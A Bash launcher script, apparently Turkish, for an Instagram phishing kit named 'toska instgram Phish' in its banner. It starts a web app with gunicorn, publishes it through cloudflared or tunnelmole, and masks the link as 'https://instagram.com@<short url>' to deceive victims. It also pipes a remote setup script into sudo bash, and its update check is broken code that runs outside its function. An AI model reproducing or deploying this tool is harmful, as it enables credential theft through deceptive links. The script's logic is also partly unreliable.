#!/bin/bash

RED='\033[1;31m'
GREEN='\033[1;32m'
YELLOW='\033[1;33m'
CYAN='\033[1;36m'
BLUE='\033[0;34m'
BOLD='\033[1m'
RESET='\033[0m'

export VERSION=2.4

banner() {
    echo -e "${CYAN}╔════════════════════════════════════════════════════════════╗${RESET}"
    echo -e "${CYAN}║                                                            ║${RESET}"
    echo -e "${PURPLE}║      ████████╗ ██████╗ ███████╗██╗  ██╗ █████╗  ██████╗     ║${RESET}"
    echo -e "${PURPLE}║      ╚══██╔══╝██╔═══██╗██╔════╝██║  ██║██╔══██╗██╔═══██╗    ║${RESET}"
    echo -e "${MAGENTA}║         ██║   ██║   ██║███████╗███████║███████║██║   ██║    ║${RESET}"
    echo -e "${MAGENTA}║         ██║   ██║   ██║╚════██║██╔══██║██╔══██║██║   ██║    ║${RESET}"
    echo -e "${RED}║         ██║   ╚██████╔╝███████║██║  ██║██║  ██║╚██████╔╝       ║${RESET}"
    echo -e "${RED}║         ╚═╝    ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝     ║${RESET}"
    echo -e "${CYAN}║                                                            ║${RESET}"
    echo -e "${CYAN}║             toska instgram Phish   hosş geldin             ║${RESET}"
    echo -e "${CYAN}║                                                            ║${RESET}"
    echo -e "${CYAN}╚════════════════════════════════════════════════════════════╝${RESET}"
}
cleanup() {
    if pgrep -f "cloudflared" > /dev/null; then
        killall cloudflared
        echo -e "\n${YELLOW} [ ! ] Cloudflared DURDU.${RESET}\n"
    fi

    if pgrep -f "tunnelmole" > /dev/null || pgrep -f "tmole" > /dev/null || pgrep -f "x-www-browser" > /dev/null; then
        pkill -f "tunnelmole"
        pkill -f "tmole"
        pkill -f "x-www-browser"
        echo -e "\n${YELLOW} [ ! ] Tunnelmole DURDU.${RESET}\n"
    fi

    if pgrep -f "gunicorn" > /dev/null; then
        pkill -f "gunicorn"
        echo -e "\n${YELLOW} [ ! ] Web uygulaması (gunicorn) durduruldu..${RESET}\n"
        sleep 1
    fi

    if [[ -n "$VIRTUAL_ENV" ]]; then
        deactivate
    fi

    exit 0
}

trap cleanup SIGINT

clean_background_process(){
    if pgrep -f "cloudflared" > /dev/null; then
        killall cloudflared
        echo -e "\n${YELLOW} [ ! ] Cloudflared DURDU.${RESET}\n"
    fi

    if pgrep -f "tunnelmole" > /dev/null || pgrep -f "tmole" > /dev/null || pgrep -f "x-www-browser" > /dev/null; then
        pkill -f "tunnelmole"
        pkill -f "tmole"
        pkill -f "x-www-browser"
        echo -e "\n${YELLOW} [ ! ] Tunnelmole DURDU.${RESET}\n"
    fi

    if pgrep -f "gunicorn" > /dev/null; then
        pkill -f "gunicorn"
        echo -e "\n${YELLOW} [ ! ] Web uygulaması (gunicorn) durduruldu..${RESET}\n"
        sleep 1
    fi

    if [[ -n "$VIRTUAL_ENV" ]]; then
        deactivate
    fi

}


check_update() 
{
    git fetch origin
    clear
    banner
    LOCAL_COMMIT=$(git rev-parse HEAD)
    REMOTE_COMMIT=$(git rev-parse origin/$(git rev-parse --abbrev-ref HEAD))
}
if [ "$LOCAL_COMMIT" != "$REMOTE_COMMIT" ]; then
    echo -e -n "\n${YELLOW} [ ? ] Yeni bir güncelleme mevcut. Yeni sürüm: ${VERSION}. Güncellemek ister misiniz? (E/H): ${RESET}"
    read -r response
    response=${response:-"E"}

    if [[ "$response" =~ ^([Ee]|[Ee][Vv][Ee][Tt])$ ]]; then
        echo -e "\n${YELLOW} [ ? ] Güncelleniyor...\n${RESET}"
        sleep 1
        git reset --hard
        git pull
        clear
        banner
        echo -e "\n${GREEN} [ + ] Güncelleme tamamlandı. Komut dosyası yeniden başlatılıyor... ${RESET}\n"
        sleep 1
        exec bash "$BASH_SOURCE"
    else
        echo -e "${RED} [ ! ] Güncelleme atlandı.${RESET}\n"
        sleep 1
    fi
else
    echo -e "\n${GREEN} [ + ] Güncelleme yok.${RESET}\n"
    sleep 1
fi


cloudflared_install() {
    if [ -d "/data/data/com.termux" ]; then
        if ! command -v curl &> /dev/null; then
            pkg install -y curl
        fi
        clear
        banner
        echo -e "\n${YELLOW} [ + ] Termux ortamı algılandı! Termux için Cloudflared yükleniyor....${RESET}\n"
        
        export TERMUX_PREFIX=~/../usr/
        curl -LO https://github.com/cloudflare/cloudflared/archive/refs/tags/2025.1.0.tar.gz
        tar -xvzf 2025.1.0.tar.gz
        cd cloudflared-2025.1.0 || exit 1
        pkg install -y golang
        go build -v -ldflags "-X \"main.Version=2025.1.0\" -X \"main.BuildTime=$(date -u '+%Y.%m.%d-%H:%M UTC')\"" ./cmd/cloudflared
        install -Dm700 -t "$TERMUX_PREFIX/bin" cloudflared
        cd ../
        rm 2025.1.0.tar.gz*
        rm -rf ./cloudflared*
        clear
        banner
        echo -e "${GREEN} [ + ] Cloudflared 2025.1.0 başarıyla kuruldu.!${RESET}"
        echo -e "${BLUE} [ + ] Kurulum dizini: ${BOLD}$TERMUX_PREFIX/bin${RESET}"
    
    else
        if ! command -v curl &> /dev/null; then
            sudo apt install -y curl
        fi
        clear
        banner
        echo -e "\n${YELLOW} [ + ] Standart Linux ortamı algılandı! Cloudflared for Linux yükleniyor....${RESET}\n"
        
        sudo curl -L -o /usr/local/bin/cloudflared https://github.com/cloudflare/cloudflared/releases/download/2025.1.0/cloudflared-linux-amd64
        sudo chmod +x /usr/local/bin/cloudflared

        clear
        banner
        echo -e "${GREEN} [ + ]Cloudflared başarıyla kuruldu.! toskaorj ${RESET}"
        echo -e "${BLUE} [ + ] Kurulum dizini: ${BOLD}/usr/local/bin/cloudflared${RESET}"
    fi
}


check_dependencies() {
    if ! cloudflared --version 2>/dev/null | grep -q '2025.1.0'; then
        cloudflared_install
    fi

    if ! command -v node &> /dev/null; then
        echo -e "${RED} [ ! ] Node.js yüklü değil. Yükleniyor....${RESET}"
        
        if [ -d "/data/data/com.termux" ]; then
            pkg update -y && pkg install -y nodejs
        else
            curl -fsSL https://deb.nodesource.com/setup_16.x | sudo -E bash -
            sudo apt-get install -y nodejs
        fi
        echo -e "${GREEN} [ + ]Node.js başarıyla kuruldu..${RESET}"
    fi

    if ! command -v tunnelmole &> /dev/null; then
        echo -e "${RED} [ ! ] Tunnelmole yüklü değil. Yükleniyor....${RESET}"
        
        if [ -d "/data/data/com.termux" ]; then
            npm install -g tunnelmole
        else
            sudo npm install -g tunnelmole
        fi
        echo -e "${GREEN} [ + ] Tunnelmole başarıyla kuruldu..${RESET}"
    fi

    if ! command -v jq &> /dev/null; then
        echo -e "${RED} [ ! ] jq yüklü değil. Yükleniyor....${RESET}"
        if [ -d "/data/data/com.termux" ]; then
            pkg update -y && pkg install -y jq
        else
            sudo apt-get update -y && sudo apt-get install -y jq
        fi
        echo -e "${GREEN} [ + ] jq başarıyla kuruldu.${RESET}"
    fi
}

install_python_dependencies() {
    if [ ! -f "./env/bin/activate" ]; then
        echo -e "\n${RED} [ ! ] Sanal ortam bulunamadı, oluşturuluyor....${RESET}\n"
        sleep 1
        python3 -m venv env
    fi
    source ./env/bin/activate
    pip install --upgrade pip
    pip install -r requirements.txt
    clear
    banner
    echo -e "\n${GREEN} [ + ] Gerekli bağımlılıklar yüklendi ve sanal ortam etkinleştirildi..${RESET}\n"
    sleep 2
}

mask_url() {
    local long_url="$1"
    
    echo -e "\n${GREEN} [ + ]URL kısaltma...${RESET}"
    sleep 1
    local short_url=$(short_url "$long_url")

    echo -e -n "\n${YELLOW} [ ? ] Özel alan adınızı girin (varsayılan: instagram.com): ${RESET}"
    read -r custom_domain
    custom_domain=${custom_domain:-"instagram.com"}
    
    echo -e "\n${GREEN} [ + ] URL masking...${RESET}\n"
    local masked_url=$(echo "$short_url" | sed "s|https://|https://${custom_domain}@|")
    sleep 3
    clear
    banner

    echo -e "${YELLOW} \n  Gizlenmiş URL: "
    echo -e "------------------------------------------------"
    echo -e "${GREEN} [ + ] ${masked_url}${YELLOW}"
    echo -e "------------------------------------------------"
}

short_url() {
    local long_url="$1"
    local api_endpoint="https://ulvis.net/API/write/post"
    
    local response=$(curl -s -X POST -d "url=$long_url" "$api_endpoint" 2>/dev/null)
    if echo "$response" | jq -e '.success' >/dev/null 2>&1; then
        echo "$(echo "$response" | jq -r '.data.url')"
    else
        echo "$long_url"  
    fi
}


select_methode () {
    clear
    banner

    echo -e "\n${YELLOW}   hangisinde olsun !"
    echo -e "----------------------"
    echo -e "|   1-${GREEN} localhost${YELLOW}       |"
    echo -e "----------------------"
    echo -e "|   2-${GREEN} cloudflared${YELLOW}     |"
    echo -e "----------------------"
    echo -e "|   3-${GREEN} tunnelmole${YELLOW}      |"
    echo -e "----------------------\n"

    while true; do
        echo -e -n "${YELLOW} [ ? ] SEÇİM: "
        read choose
        
        if [[ "$choose" =~ ^[1-3]$ ]]; then
            break  
        else
            echo -e "${RED} [ ! ] (TOSKAORJ) Lütfen geçerli bir numara girin. 1/2/3!${RESET}"
        fi
    done

    while true; do
        echo -e -n "${YELLOW} [ ? ] port gir ( örnek 8080): "
        read port
        port=${port:-8080}  

        if [[ "$port" =~ ^[0-9]+$ ]] && [ "$port" -ge 1 ] && [ "$port" -le 65535 ]; then
            break  
        else
            echo -e "${RED} [ ! ] (toskaorj)  Geçersiz port numarası. Lütfen geçerli bir port numarası girin. (1-65535).${RESET}"
        fi
    done  

    clear
    banner

    case $choose in
        1)
            echo -e "${GREEN} [ + ] Uygulama bu port üzerinden başlatılıyor $port ...${RESET}"
            gunicorn --bind 0.0.0.0:$port web_app:app 2>/dev/null &  
            sleep 1
            clear
            banner
            echo -e "\n${YELLOW} (toskaorj)  Local url: "
            echo -e "------------------------------------------------"
            echo -e "${GREEN} [ + ] http://127.0.0.1:$port${YELLOW}"
            echo -e "------------------------------------------------"
            ;;

        2)
            echo -e "${GREEN} [ + ] Uygulamayı port üzerinden başlatma $port ...${RESET}"
            gunicorn --bind 0.0.0.0:$port web_app:app 2>/dev/null &  
            sleep 1
            cloudflared tunnel --no-autoupdate --metrics localhost:55555 --url http://localhost:$port 2>/dev/null & 
            echo -e "\n${GREEN} [ + ] Cloudflared starting...."

            original_url=""
            while [[ -z "$original_url" || "$original_url" == "null" ]]; do
                original_url=$(curl -s http://localhost:55555/quicktunnel | jq -r '.hostname')
                sleep 1 
            done

            clear
            banner
            echo -e "${YELLOW} \n   Orjinal url: "
            echo -e "------------------------------------------------"
            echo -e "${GREEN} [ + ] https://${original_url}${YELLOW}"
            echo -e "------------------------------------------------"

            echo -e -n "\n${YELLOW} [ ? ] Maske URL'sini istiyor musunuz? (E/H): ${RESET}"
            read -r response
            response=${response:-"E"}

            if [[ "$response" =~ ^([Ee]|[Ee][Vv][Ee][Tt])$ ]]; then
                mask_url "https://${original_url}"
            else
                echo -e "\n${RED} [ ! ] URL maskeleme atlandı.${RESET}\n"
            fi
            ;;
        3)
            echo -e "${GREEN} [ + ] Uygulamayı port üzerinden başlatma $port ...${RESET}"
            gunicorn --bind 0.0.0.0:$port web_app:app 2>/dev/null &  
            sleep 1
            echo -e "\n${GREEN} [ + ] Tunnelmole'u başlatmak için PORT $port...${RESET}"
            sleep 2
            clear
            banner
            tunnelmole $port 
            sleep 1
            ;;

        *)
            echo -e "${RED} [ ! ] (TOSKAORJ) Lütfen geçerli bir numara girin. 1/2/3!${RESET}"
            sleep 1
            select_methode  
            ;;

    esac
}

check_update
clean_background_process
install_python_dependencies
check_dependencies
select_methode

while true; do
    sleep 1
done
